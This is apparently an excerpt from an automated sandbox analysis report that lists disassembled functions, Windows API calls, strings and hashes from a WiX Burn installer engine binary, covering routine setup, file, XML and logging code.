                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00916CEC,00916C78,00916C5C,?,?,?,00917B5B,?,?,00000000,?,?,00000003,00000000,00916570,00000000), ref: 009167F8
                                                                                                                                                                    • Part of subcall function 0096B796: OpenProcessToken.ADVAPI32(00916570,00000008,00000000,00916C5C,00916C78,00000000,00916570,00000000,?,?,?,?,?,?), ref: 0096B7B4
                                                                                                                                                                    • Part of subcall function 0096B796: GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0096B7BE
                                                                                                                                                                    • Part of subcall function 0096B796: CloseHandle.KERNELBASE(00000000), ref: 0096B876
                                                                                                                                                                    • Part of subcall function 0093469C: CompareStringW.KERNEL32(0000007F,00000001,00000002,000000FF,0098E414,000000FF,00916C5C,00916C78,00916570,?,00000000,?), ref: 0093470C
                                                                                                                                                                    • Part of subcall function 0093469C: CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,log,000000FF), ref: 0093472F
                                                                                                                                                                    • Part of subcall function 0093469C: CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,xlog,000000FF), ref: 00934752
                                                                                                                                                                    • Part of subcall function 0093469C: CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,0098E458,000000FF), ref: 00934775
                                                                                                                                                                    • Part of subcall function 0093469C: CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,0098E45C,000000FF), ref: 00934798
                                                                                                                                                                    • Part of subcall function 0093469C: CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,help,000000FF), ref: 009347BB
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 0091688C
                                                                                                                                                                  • Failed to initialize engine section., xrefs: 0091684D
                                                                                                                                                                  • Fatal error while parsing command line., xrefs: 00916824
                                                                                                                                                                  • Failed to initialize internal cache functionality., xrefs: 0091687A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareString$CriticalInitializeSection$Process$CloseCurrentErrorHandleLastOpenToken
                                                                                                                                                                  • String ID: Failed to initialize engine section.$Failed to initialize internal cache functionality.$Fatal error while parsing command line.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                  • API String ID: 268551788-2320754317
                                                                                                                                                                  • Opcode ID: 378725962f54fc5a275faec83f9a50cbfc05e90028d17980609a7a956c4f0530
                                                                                                                                                                  • Instruction ID: 634070a5152bdcd39db9cd1c812448b19371a16b3952989618e2eef3b06eb10f
                                                                                                                                                                  • Opcode Fuzzy Hash: 378725962f54fc5a275faec83f9a50cbfc05e90028d17980609a7a956c4f0530
                                                                                                                                                                  • Instruction Fuzzy Hash: 7B315472A41219BBDB01DFA4DC85FDB3BACAF48750F0502B5FE08EF185E674A5448BA0
                                                                                                                                                                  Function 0096B796 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 89COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • OpenProcessToken.ADVAPI32(00916570,00000008,00000000,00916C5C,00916C78,00000000,00916570,00000000,?,?,?,?,?,?), ref: 0096B7B4
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0096B7BE
                                                                                                                                                                  • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),00000004,00000004,?,?,?,?,?,?,?), ref: 0096B807
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0096B820
                                                                                                                                                                  • CloseHandle.KERNELBASE(00000000), ref: 0096B876
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastToken$CloseHandleInformationOpenProcess
                                                                                                                                                                  • String ID: Failed to get elevation token from process.$Failed to open process token.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\procutil.cpp
                                                                                                                                                                  • API String ID: 4040495316-1812211342
                                                                                                                                                                  • Opcode ID: 86b54377c2d46a968cc22a9f3545fe7f3890f2a3e90b00cd0c77868bb474ed17
                                                                                                                                                                  • Instruction ID: dd59852529a7ffd80805b1a9355b843b40568e42e1460f0af769065a937ef0c8
                                                                                                                                                                  • Opcode Fuzzy Hash: 86b54377c2d46a968cc22a9f3545fe7f3890f2a3e90b00cd0c77868bb474ed17
                                                                                                                                                                  • Instruction Fuzzy Hash: B621E432E41228BBD7219B559C49FAEBAACEF45750F014055FE08FB2A0F3748E80DAD0
                                                                                                                                                                  Function 0097058B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 51COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 0097059B
                                                                                                                                                                  • CLSIDFromProgID.COMBASE(Msxml2.DOMDocument,009AD6D8,?,00000000,00917C5D,?,?,?,?,?,?), ref: 009705EA
                                                                                                                                                                  • CLSIDFromProgID.OLE32(MSXML.DOMDocument,009AD6D8,?,?,?,?,?,?), ref: 009705FA
                                                                                                                                                                  Strings
                                                                                                                                                                  • failed to get CLSID for XML DOM, xrefs: 00970606
                                                                                                                                                                  • failed to initialize COM, xrefs: 009705AF
                                                                                                                                                                  • Msxml2.DOMDocument, xrefs: 009705E5
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 009705BB
                                                                                                                                                                  • MSXML.DOMDocument, xrefs: 009705F5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FromProg$Initialize
                                                                                                                                                                  • String ID: MSXML.DOMDocument$Msxml2.DOMDocument$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed to get CLSID for XML DOM$failed to initialize COM
                                                                                                                                                                  • API String ID: 4047641309-3267221515
                                                                                                                                                                  • Opcode ID: ff6e03e56e81bc1e0ea45a90de2844684fd1893c0b41e2da44efa859e473e62b
                                                                                                                                                                  • Instruction ID: a8eb372bb2df3a55beb9c9ea0cb75374c02b0622f321d08146242939ca104f96
                                                                                                                                                                  • Opcode Fuzzy Hash: ff6e03e56e81bc1e0ea45a90de2844684fd1893c0b41e2da44efa859e473e62b
                                                                                                                                                                  • Instruction Fuzzy Hash: 0101F773BD6730B7E33117165C0AB571948ABE6BA6F018112B90EE7180E5D449809AD0
                                                                                                                                                                  Function 00973BE0 Relevance: 13.6, APIs: 5, Strings: 4, Instructions: 135memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,?,00000000,00000001,00000000), ref: 00973C09
                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,?,00000000,00000001,00000000), ref: 00973C54
                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,00000000), ref: 00973C98
                                                                                                                                                                  • GetLastError.KERNEL32(?,0097F890,?,00000000,?,00000000,00000000,00000000), ref: 00973CF6
                                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00973D48
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$Global$AllocFree
                                                                                                                                                                  • String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp$failed to allocate version info for file: %ls$failed to get version info for file: %ls$failed to get version value for file: %ls
                                                                                                                                                                  • API String ID: 1145190524-120110023
                                                                                                                                                                  • Opcode ID: d05eb6ca50f7401b542a328a5523f123b35b56b1a173bc5c6ffc13df021c647f
                                                                                                                                                                  • Instruction ID: db26f4d9bd4b19c7ab6d57b0770bc7c52bc06d5b268109ab6a4701c8430436e7
                                                                                                                                                                  • Opcode Fuzzy Hash: d05eb6ca50f7401b542a328a5523f123b35b56b1a173bc5c6ffc13df021c647f
                                                                                                                                                                  • Instruction Fuzzy Hash: 5841C473B40328BBD72196549C06FEF7A6CAF85B60F11C165BE48BB2C1D670CE00A6E1
                                                                                                                                                                  Function 00971EC9 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 106COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000001,00000000,000000FF,00000000,000000FF,00000000,00000005,00000000,00000000,00000005,00000000,00000000,00000000,0000001C), ref: 00971F49
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,0092F669,?,0000001C,00000000,0000001C,?,00000000,WiX\Burn,PackageCache,00000000,0000001C,00000018,00000000), ref: 00971F53
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareErrorLastString
                                                                                                                                                                  • String ID: Both paths are required.$Failed to canonicalize wzPath1.$Failed to canonicalize wzPath2.$Failed to compare canonicalized paths.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\path2utl.cpp
                                                                                                                                                                  • API String ID: 1733990998-2188151180
                                                                                                                                                                  • Opcode ID: 4444cbae7e6e8cf645f11d3297e06fa0aa58f7fa2205b26a448ecdd8146c6aad
                                                                                                                                                                  • Instruction ID: 5b86fc91c77996593539195a7fdff3caa618fea53735e1e9434d63b05ae2898b
                                                                                                                                                                  • Opcode Fuzzy Hash: 4444cbae7e6e8cf645f11d3297e06fa0aa58f7fa2205b26a448ecdd8146c6aad
                                                                                                                                                                  • Instruction Fuzzy Hash: 4B315E73A10228BBDB2156588C46FFFB9ACDB85B64F118215F908BA2D0D3B09D40D6D4
                                                                                                                                                                  Function 00916305 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 103COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateDirectoryW.KERNELBASE(00000001,?,00000001,00000000,?,0092ED80,00000000,00000000,?,00000021,00000000,00000000,A0000013,00000000,00000000,00000000), ref: 00916313
                                                                                                                                                                  • GetLastError.KERNEL32(?,0092ED80,00000000,00000000,?,00000021,00000000,00000000,A0000013,00000000,00000000,00000000,00000000,?,00000021,00000000), ref: 00916321
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                                                                                  • String ID: cannot find parent path$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dirutil.cpp$failed to create path: %ls
                                                                                                                                                                  • API String ID: 1375471231-3388094611
                                                                                                                                                                  • Opcode ID: 7fb9893aa53d12664ea32aab8d3a46624a6d8362bc75ed4f6991d1a3eb43aa85
                                                                                                                                                                  • Instruction ID: 804d735b67a21ef1d839c0f91c76867d44408c9058e9580051cc831522fb9694
                                                                                                                                                                  • Opcode Fuzzy Hash: 7fb9893aa53d12664ea32aab8d3a46624a6d8362bc75ed4f6991d1a3eb43aa85
                                                                                                                                                                  • Instruction Fuzzy Hash: E3212826F44338B3EB312A548C46FFF6A5C9B85B60F010425FD58AB1D1D6A58CC2A2E0
                                                                                                                                                                  Function 009118C0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 89COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: %ls%ls$Failed to create the fully-qualified path to %ls.$Failed to get the Windows system directory.$Failed to load the library %ls.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\apputil.cpp
                                                                                                                                                                  • API String ID: 0-242608188
                                                                                                                                                                  • Opcode ID: af84df120d6364cfe8ac61c1b8645785ded3e32762ccbc1bdfa0c68dcadc4823
                                                                                                                                                                  • Instruction ID: 9d4ddbe78d24bd5d5d0f3272fc420261e0178f6cf99b5c75113ebdf03a4ce422
                                                                                                                                                                  • Opcode Fuzzy Hash: af84df120d6364cfe8ac61c1b8645785ded3e32762ccbc1bdfa0c68dcadc4823
                                                                                                                                                                  • Instruction Fuzzy Hash: B321EA77F4031DB7DB219B549C06FEE7EAC9F84B54F004095BB18BA2D0E2B15E80D690
                                                                                                                                                                  Function 00932BBD Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 71fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,00000000,00000000,?,00000000,?), ref: 00932BF1
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00932C80
                                                                                                                                                                  Strings
                                                                                                                                                                  • -%ls=%Iu, xrefs: 00932C08, 00932C4B
                                                                                                                                                                  • burn.filehandle.self, xrefs: 00932C03, 00932C46
                                                                                                                                                                  • Failed to append the file handle to the command line., xrefs: 00932C1E
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\core.cpp, xrefs: 00932C30
                                                                                                                                                                  • Failed to append the file handle to the obfuscated command line., xrefs: 00932C61
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateFileHandle
                                                                                                                                                                  • String ID: -%ls=%Iu$Failed to append the file handle to the command line.$Failed to append the file handle to the obfuscated command line.$burn.filehandle.self$d:\a\wix4\wix4\src\burn\engine\core.cpp
                                                                                                                                                                  • API String ID: 3498533004-2018830601
                                                                                                                                                                  • Opcode ID: f9155c8633d8be75995bcce922356ee98ddfb6d5dde32715f46f65ac6f70a6a2
                                                                                                                                                                  • Instruction ID: 9f5536918f0bfbcd26aa0fea81643a8cda1b37b41fa9778817bf9b26006b4a11
                                                                                                                                                                  • Opcode Fuzzy Hash: f9155c8633d8be75995bcce922356ee98ddfb6d5dde32715f46f65ac6f70a6a2
                                                                                                                                                                  • Instruction Fuzzy Hash: 3A11B231A80329B7E7217F588D0AF9F3E689B85B75F100341FA64B62D1E3F449518B91
                                                                                                                                                                  Function 0097061B Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 145COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • VariantInit.OLEAUT32(00917D5B), ref: 00970651
                                                                                                                                                                    • Part of subcall function 0096FE01: GetModuleHandleA.KERNEL32(kernel32.dll,?,00000000,00917DDB,?,00970662,00000000,00917D5B,00000000,?,?,009340B9,?,?,00917D5B,?), ref: 0096FE1F
                                                                                                                                                                    • Part of subcall function 0096FE01: GetLastError.KERNEL32(?,00970662,00000000,00917D5B,00000000,?,?,009340B9,?,?,00917D5B,?,?,?,?,?), ref: 0096FE2B
                                                                                                                                                                  Strings
                                                                                                                                                                  • failed XmlCreateDocument, xrefs: 00970674
                                                                                                                                                                  • failed put_resolveExternals, xrefs: 009706F1
                                                                                                                                                                  • failed put_validateOnParse, xrefs: 009706B5
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 00970683, 009706C4
                                                                                                                                                                  • failed loadXML, xrefs: 00970761
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorHandleInitLastModuleVariant
                                                                                                                                                                  • String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed XmlCreateDocument$failed loadXML$failed put_resolveExternals$failed put_validateOnParse
                                                                                                                                                                  • API String ID: 52713655-3681987369
                                                                                                                                                                  • Opcode ID: edba617c8bdaae96102270389472e0158c5ccbf5df57b77dba76cab706deb218
                                                                                                                                                                  • Instruction ID: 0149adc34959de0d5d6786394a91593d1838125bb1ae0486a812ec564cdae12f
                                                                                                                                                                  • Opcode Fuzzy Hash: edba617c8bdaae96102270389472e0158c5ccbf5df57b77dba76cab706deb218
                                                                                                                                                                  • Instruction Fuzzy Hash: 0041A372B40718ABDB05DF68CC45FDE77B9AF89710F018069F519FB290EA70AD008B94
                                                                                                                                                                  Function 00975F3A Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 125COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,009762A5,00000000,00000000,80000002,00000000,00020019,?,00020019,00000000,00000000,00000000), ref: 00975FBC
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to re-allocate more space for expanded path., xrefs: 00976027
                                                                                                                                                                  • Failed to get max length of written input buffer., xrefs: 00976016
                                                                                                                                                                  • Failed to expand environment variables in string: %ls, xrefs: 00976052
                                                                                                                                                                  • Failed to get max length of input buffer., xrefs: 00975F5F
                                                                                                                                                                  • Failed to allocate space for expanded path., xrefs: 00975F98
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\env2util.cpp, xrefs: 00975F6B, 00976044, 00976049, 0097605E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                  • String ID: Failed to allocate space for expanded path.$Failed to expand environment variables in string: %ls$Failed to get max length of input buffer.$Failed to get max length of written input buffer.$Failed to re-allocate more space for expanded path.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\env2util.cpp
                                                                                                                                                                  • API String ID: 1452528299-33012345
                                                                                                                                                                  • Opcode ID: 366dc861e591dcad84512a5a19fd94fa0c0e1c13816162a6900e620a4d3296d9
                                                                                                                                                                  • Instruction ID: 14039c10c0f6a1fd3c22640cc54eaffa215249ab21a4d3d56da92125613169ae
                                                                                                                                                                  • Opcode Fuzzy Hash: 366dc861e591dcad84512a5a19fd94fa0c0e1c13816162a6900e620a4d3296d9
                                                                                                                                                                  • Instruction Fuzzy Hash: 89313B73B40B25B7EB325A558C4AF6F7E6CAB41BA0F124511FE08BF2C1D6B09D1096D0
                                                                                                                                                                  Function 0096AABF Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 101COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: Failed to concatenate string to pre-init buffer$Failed to get length of raw string$Failed to write output to log: %ls - %hs$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\logutil.cpp
                                                                                                                                                                  • API String ID: 0-492501437
                                                                                                                                                                  • Opcode ID: 1f962077b66ea5a8cd8246560e98948e3473baa3fe00a4e308546acdae6a19aa
                                                                                                                                                                  • Instruction ID: 98c1ab6fb5fd155ae85631a143d17264e0abf499167e68af84c712b29ad459bf
                                                                                                                                                                  • Opcode Fuzzy Hash: 1f962077b66ea5a8cd8246560e98948e3473baa3fe00a4e308546acdae6a19aa
                                                                                                                                                                  • Instruction Fuzzy Hash: FD21F872B4122877D72196648C4AFFF7A6DDB86B64F110601F601BB1C1E7B89D409AE1
                                                                                                                                                                  Function 0096D0CB Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 142stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • lstrlenW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000003,00000000,00000000,?,?,?,0096CDF4), ref: 0096D224
                                                                                                                                                                    • Part of subcall function 009155C9: GetProcessHeap.KERNEL32(00000000,?,?,?,0093DE2B,?), ref: 009155D3
                                                                                                                                                                    • Part of subcall function 009155C9: RtlFreeHeap.NTDLL(00000000,?,?,0093DE2B,?), ref: 009155DA
                                                                                                                                                                    • Part of subcall function 009155C9: GetLastError.KERNEL32(?,?,0093DE2B,?), ref: 009155E4
